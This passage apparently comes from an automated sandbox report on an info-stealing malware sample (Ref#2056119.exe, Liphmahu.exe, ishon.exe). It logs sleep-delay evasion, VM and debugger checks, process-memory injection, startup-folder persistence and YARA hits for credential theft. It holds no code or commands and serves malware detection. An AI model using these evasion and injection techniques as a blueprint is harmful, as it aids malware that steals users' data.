                      Source: C:\Users\user\AppData\Roaming\ishon.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99764Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99655Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99546Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99328Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99218Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99109Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98999Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98890Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98781Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98670Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98543Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98421Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98312Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98179Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97998Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97796Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97575Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97453Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97343Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97234Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97124Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97015Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96901Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96781Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96671Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96562Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96453Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96343Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96230Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96109Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95999Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95888Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95765Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95656Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95546Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95435Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95324Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95194Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95078Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 94956Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 94830Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 99854Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 99704Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 99578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 99452Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 99330Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 99055Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 98860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 98735Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 98534Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 98407Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 98282Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 98157Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 98032Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97922Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97813Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97688Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97563Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97294Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97184Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 97075Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96946Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96824Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96716Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96573Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96467Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96356Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96213Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 96090Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99828Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99520Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99292Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 99148Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98906Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98781Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98672Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98547Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98437Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98328Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98218Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98109Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 98000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97871Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97762Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97640Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97531Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97422Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97312Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97193Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 97074Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96953Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96464Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96357Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96249Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96125Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 96015Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95906Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95797Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95687Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95578Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95468Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 95359Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99886
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99656
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99547
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99437
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99219
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99109
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99000
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98891
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98766
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98641
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98479
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98341
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98187
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98075
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97969
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97859
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97750
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97640
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97531
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97422
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97312
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97203
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97094
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96984
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96875
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96765
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96656
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96546
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96437
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96328
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96219
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96078
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 95967
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 95789
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99641
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99532
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99407
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99297
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99188
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99063
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98938
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98813
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98688
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98578
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98469
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98344
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98235
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98110
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97985
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97840
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97715
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97609
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97493
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97375
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97266
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97141
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97016
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96907
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96782
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96657
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96547
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96438
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96313
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96188
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96063
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 95938
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 95828
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 95719
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: Ref#2056119.exe, 00000000.00000002.2053393935.0000000006F30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: iNHGFs8Tfb
                      Source: ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                      Source: ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
                      Source: ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: Liphmahu.exe, 00000004.00000002.2191181764.000000000083B000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.0000000001491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory written: C:\Users\user\Desktop\Ref#2056119.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMemory written: C:\Users\user\AppData\Local\Temp\Liphmahu.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory written: C:\Users\user\AppData\Roaming\ishon.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Users\user\Desktop\Ref#2056119.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Liphmahu.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Users\user\Desktop\Ref#2056119.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Users\user\AppData\Roaming\ishon.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Liphmahu.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Users\user\AppData\Roaming\ishon.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#2056119.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
